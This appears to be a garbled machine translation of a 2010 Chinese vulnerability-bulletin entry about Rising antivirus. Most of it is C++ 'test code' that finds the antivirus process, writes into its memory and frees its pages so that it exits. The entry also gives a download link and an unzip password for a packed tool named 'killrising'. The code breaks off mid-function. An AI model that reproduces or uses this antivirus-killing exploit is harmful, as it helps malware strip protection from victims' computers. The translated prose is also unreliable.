Rising 2 0 1 0 year combined version of the latest vulnerability-vulnerability warning-the black bar safety net

2010-03-03T00:00:00
ID MYHACK58:62201026302
Type myhack58
Reporter 佚名
Modified 2010-03-03T00:00:00

Description

Vulnerability Description: The Swiss Star memory address constantly written into the code so that its error exit

killrising.rar (4 8 2 4 K) <http://www.51chi.net/qing/killrising.rar>

Unzip password: qing520

Test code: Copy the code DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0;

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe. dwSize = sizeof(PROCESSENTRY32); if( ! Process32First(hSnapshot,&pe) ) return 0;

do { pe. dwSize = sizeof(PROCESSENTRY32); if( Process32Next(hSnapshot,&pe)==FALSE ) break; if(strcmp(pe. szExeFile,name) == 0) { id = pe. th32ProcessID; break; }

} while(1);

CloseHandle(hSnapshot);

return id; }

DWORD GetProcessID(char *FileName) { HANDLE myhProcess; PROCESSENTRY32 mype; BOOL mybRet; //Process snapshot

myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS a snapshot of all processes //Start the process to find mybRet=Process32First(myhProcess,&mype); //Loop comparison, the ProcessID while(mybRet) { if(strcmp(FileName,mype. szExeFile)==0) return mype. th32ProcessID; else mybRet=Process32Next(myhProcess,&mype); } return 0; }

void killProcess(CString www ,LPCTSTR name,char *xyz) {

DWORD nPid = 0; HANDLE hProcess; DWORD nExitCode = 0; DWORD nAddress = 0x1000; nPid=GetProcessIdFromName(name); hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid); WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);

while ( nAddress <= 0x7FFFF000 ) { GetExitCodeProcess(hProcess, &nExitCode); if (nExitCode != STILL_ACTIVE) { break; } WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL); VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000); nAddress += 0x1000; }